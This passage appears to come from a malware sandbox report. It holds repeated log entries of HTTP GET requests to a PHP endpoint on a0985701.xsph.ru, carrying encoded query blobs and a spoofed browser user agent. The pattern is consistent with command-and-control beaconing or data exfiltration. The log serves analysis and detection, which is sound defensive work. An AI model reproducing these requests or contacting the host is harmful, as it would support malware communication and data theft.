Jl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ru
            Source: global trafficHTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=QX9JiI6IiMyEjNwkDO0UWNhJ2M0EjZycDMkRGZ1E2Y0gTZiVzYiJCLiUWM3EGZlVmN1EWYzEWO1cTOmFGNzIWNjNmZ4EGMkZWYyM2N4cTZkVmI6ICMmdDZwEmY2EjYiNmZzkTZ5I2NkFjY0ImMiRjY3kTZkJCLiMGOkFzYzMzN2gTOjFzYzcjMxUDOhRGZxcDMwYTNzImNhRWY3QmMyYmI6IiNlBjMzgzY0EGOxEGNhFWZ5QGO1MzM5QjNyMGZmBjZwIyes0nI5YlaPlWUYRmdWdlYwJlRjxmVHJGVKNETpNWbiBnQYpFb4JTVp9maJpnVIRGaSNTV1IFWhJDbHRmaGtWSzlUaJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ru
            Source: global trafficHTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ru
            Source: global trafficHTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2A